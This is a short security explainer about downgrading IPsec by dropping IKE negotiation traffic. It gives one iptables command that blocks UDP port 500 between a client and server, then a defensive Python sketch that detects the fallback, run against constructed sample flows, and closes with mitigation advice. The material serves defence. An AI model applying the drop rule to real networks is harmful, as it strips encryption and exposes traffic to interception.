If the client and the server request IPsec but do not require it, an attacker can disable it by dropping the IKE negotiation traffic (UDP port 500) between them:

    iptables -t nat -A PREROUTING -i eth0 -p udp -s <client> -d <server> --dport 500 -j DROP
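Seen from the defender's side, this downgrade leaves a recognizable trace: IKE initiations that never get a reply, followed by cleartext traffic between the same two hosts. The following detection sketch is an added example, not part of the original page; the flow-record format, the addresses and the `min_unanswered` threshold are constructed for illustration, and it assumes all traffic between the peers is expected to be IPsec-protected.

```python
from collections import defaultdict

IKE_PORTS = {500, 4500}  # IKE, and IKE/ESP over NAT-T

# Constructed sample flow records: (time, src, dst, proto, dport)
SAMPLE_FLOWS = [
    # Healthy pair: IKE is answered, then ESP carries the traffic.
    (1, "10.0.0.5", "10.0.0.9", "udp", 500),
    (2, "10.0.0.9", "10.0.0.5", "udp", 500),
    (3, "10.0.0.5", "10.0.0.9", "esp", None),
    # Downgraded pair: IKE retransmitted with no reply, then cleartext SMB.
    (10, "10.0.0.7", "10.0.0.9", "udp", 500),
    (12, "10.0.0.7", "10.0.0.9", "udp", 500),
    (15, "10.0.0.7", "10.0.0.9", "tcp", 445),
]


def is_ike(proto, dport):
    return proto == "udp" and dport in IKE_PORTS


def find_downgrades(flows, min_unanswered=2):
    """Return sorted (initiator, responder) pairs where IKE went
    unanswered and cleartext traffic between the pair followed."""
    pending = defaultdict(int)  # (src, dst) -> IKE packets awaiting a reply
    flagged = set()
    for _ts, src, dst, proto, dport in sorted(flows, key=lambda f: f[0]):
        if is_ike(proto, dport):
            if pending[(dst, src)] > 0:
                pending[(dst, src)] = 0   # reply to an outstanding request
            else:
                pending[(src, dst)] += 1  # new or retransmitted request
        elif proto == "esp":
            continue                      # protected traffic, nothing to flag
        else:
            # Cleartext: suspicious if either side still has unanswered IKE.
            for a, b in ((src, dst), (dst, src)):
                if pending[(a, b)] >= min_unanswered:
                    flagged.add((a, b))
    return sorted(flagged)


if __name__ == "__main__":
    for initiator, responder in find_downgrades(SAMPLE_FLOWS):
        print(f"possible IPsec downgrade: {initiator} -> {responder}")
```

Detection only reports the fallback after it has happened; the fix is to configure both peers to require IPsec so that a failed negotiation results in no traffic rather than cleartext traffic.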